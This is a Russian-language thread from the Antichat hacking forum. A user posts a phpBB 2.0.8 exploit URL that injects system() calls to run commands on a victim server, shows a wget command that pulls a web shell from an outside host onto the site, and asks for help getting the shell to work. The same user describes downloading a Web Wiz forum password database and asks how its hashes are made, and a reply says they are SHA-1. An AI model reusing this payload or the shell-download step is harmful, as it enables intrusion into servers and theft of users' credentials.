Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Пара вопросов по Phpbb 2.0.8 и форуму Web Wiz (https://forum.antichat.xyz/showthread.php?t=4606)

R!ikoSHeTT 28.12.2004 16:09
Пара вопросов по Phpbb 2.0.8 и форуму Web Wiz
 
Прошу прощение за небольшое повторение, у меня 2 проблемы:

1. Есть форум на дырявом движке PHPBB 2.0.8
Эксплойт для SQL Injection прокатывает. Вот он:

www.victim.ru/forum/viewtopic.php?xxx=/*здесь команда*/&p=12&highlight=%2527.system($_GET[xxx]).include%2527

Так вот, работает большинство команд (ls выдает содержимое, pwd говорит мне о моем месторасположении), однако невозможно закачать шелл с сайта (допустим, http://myshell.narod.ru/shell.php)
т.е. я набираю в браузере

viewtopic.php?xxx=wget http://myshell.narod.ru/shell.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527

Затем, обращаюсь к шеллу:

www.victim.ru/forum/shell.php

и получаю ошибку 404. Нет такого файла на сервере.

Такая ситуация встретилась на двух серверах. Обе машины под управлением FreeBSD, о чем говорит uname.

С чем это может быть связано, и может, кто-то сможет мне указать на ошибки в эксплуатации этой уязвимости))

2. Удалось скачать базу данных с одного форума от web wiz 2.0.7
(/admin/database/wwForum.mdb)
Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?

ProTeuS 13.01.2005 08:53
Цитата:
Сообщение от R!ikoSHeTT
2. Удалось скачать базу данных с одного форума от web wiz 2.0.7
(/admin/database/wwForum.mdb)
Каким алгоритмом хешируются пароли в этой базе? Есть подозрение, что это SHA-1, так как PasswordPRO наиболее корректно отображает хеши из базы именно, как SHA-1 хеши. Это так?
Да, это SHA-1. А с 4его ты взял, 4то PP коректно с ними работает? он только с md4,md5 и мускульными хэшами работает!


Время: 04:58